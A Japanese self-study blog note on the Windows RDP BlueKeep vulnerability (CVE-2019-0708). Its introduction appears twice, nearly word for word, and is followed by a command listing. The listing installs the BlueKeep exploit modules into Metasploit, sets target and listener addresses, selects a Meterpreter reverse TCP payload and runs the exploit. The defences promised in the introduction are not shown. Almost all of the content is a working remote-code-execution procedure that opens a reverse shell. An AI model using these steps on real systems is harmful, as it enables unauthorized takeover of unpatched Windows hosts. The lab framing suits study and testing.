この記事では、Windows リモートデスクトップサービスの脆弱性(CVE-2019-0708)について解説し、その脆弱性と防御策について詳しく説明します。著者はサイバーセキュリティの初心者として、主にセキュリティツールや実践操作に関するオンラインノートである基礎チュートリアルを皆さんと共有します。お楽しみいただければ幸いです。また、ぜひ私と一緒に操作し、成長していただければと思います。今後はネットワークセキュリティやシステムセキュリティの知識を深く学び、関連する実験を共有していきます。とにかく、このシリーズの記事がブロガーの皆さんの助けになれば幸いです。記事を書くのは簡単ではありませんので、上級者の方は否定的なコメントはご遠慮ください。ありがとうございます!
この記事では、Windows リモートデスクトップサービスの脆弱性(CVE-2019-0708)について共有し、当該脆弱性と防御策について詳しく説明します。著者はネットワークセキュリティの初心者として、主にセキュリティツールと実践操作に関するオンラインノートをいくつか共有します。気に入っていただければ幸いです。同時に、皆様と一緒に操作し、成長できることを願っており、今後はネットワークセキュリティとシステムセキュリティの知識を深く学び、関連する実験を共有していきます。要するに、このシリーズの記事がブログ友達の役に立てば幸いです。執筆は簡単ではありませんので、上級者の皆様はお気を悪くなさらないでください。ありがとうございます!
対応ブログ:
[ネットワークセキュリティ自学編] 五十八.Windows脆弱性活用之再看CVE-2019-0708及Metasploit反弹shell
[ネットワークセキュリティ自学編] 四十四.Windowsリモートデスクトップサービス脆弱性(CVE-2019-0708)再現及詳解
コアコマンド:
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# 开启工具
msfconsole
reload_all
search 0708
# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# 查看信息
show options
show targets
info
# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# 运行脚本
run
exploit
# 设置带宽
Set GROOMSIZE 40